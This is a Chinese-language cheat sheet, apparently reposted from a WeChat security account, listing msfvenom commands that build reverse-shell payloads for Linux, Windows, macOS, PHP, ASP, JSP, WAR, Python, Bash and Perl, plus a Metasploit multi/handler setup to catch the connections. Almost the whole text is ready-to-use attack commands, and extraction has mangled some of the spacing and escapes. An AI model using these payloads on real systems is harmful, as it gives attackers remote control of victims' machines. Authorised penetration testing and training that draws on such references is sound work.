通常 Metasploit 最有用(对于初学者来说被低估)的功能之一是 msfpayload 模块。可以使用此模块创建多个有效负载,它有助于在几乎任何情况下为您提供外壳。对于这些有效负载中的每一个,您都可以进入 msfconsole 并选择exploit/multi/handler。为使用的相关负载运行“设置负载”并配置所有必要的选项(LHOST、LPORT 等)。执行并等待有效负载运行。对于下面的示例,它是不言自明的,但 LHOST 应填写您的 IP 地址(如果在网络内进行攻击,则为 LAN IP,如果通过 Internet 进行攻击,则为 WAN IP),并且 LPORT 应该是您希望重新连接的端口。
Linux
msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f elf > shell.elfWindows
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f exe > shell.exeMac
msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址> LPORT = <您要连接的端口> -f macho > shell.machoPHP
msfvenom -p php / meterpreter_reverse_tcp LHOST = <你的 IP 地址> LPORT = <你的连接端口> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php' | tr -d 'n' > shell.php && pbpaste shell.php
ASP
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f asp > shell.aspJSP
msfvenom -p java / jsp_shell_reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f raw > shell.jspWar
msfvenom -p java / jsp_shell_reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f war > shell.warPython
msfvenom -p cmd / unix / reverse_python LHOST = <你的 IP 地址> LPORT = <你要连接的端口> -f raw > shell.pyBash
msfvenom -p cmd / unix / reverse_bash LHOST = <您的 IP 地址> LPORT = <您要连接的端口> -f raw > shell.shPerl
msfvenom -p cmd / unix / reverse_perl LHOST = <你的 IP 地址> LPORT = <你要连接的端口> -f raw > shell.plLinux Based Shellcode
msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f <语言>Windows Based Shellcode
msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f <语言>Mac Based Shellcode
msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址> LPORT = <您要连接的端口> -f <语言>设置 Metasploit 以接收传入的 shell
use exploit/multi/handlerset PAYLOAD <Payload name>set LHOST <LHOST value>set LPORT <LPORT value>set ExitOnSession falseexploit -j -z
完成所需的值后,以下命令将执行您的处理程序 – 'msfconsole -L -r
本文始发于微信公众号(Khan安全攻防实验室):收藏Metasploit payload
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论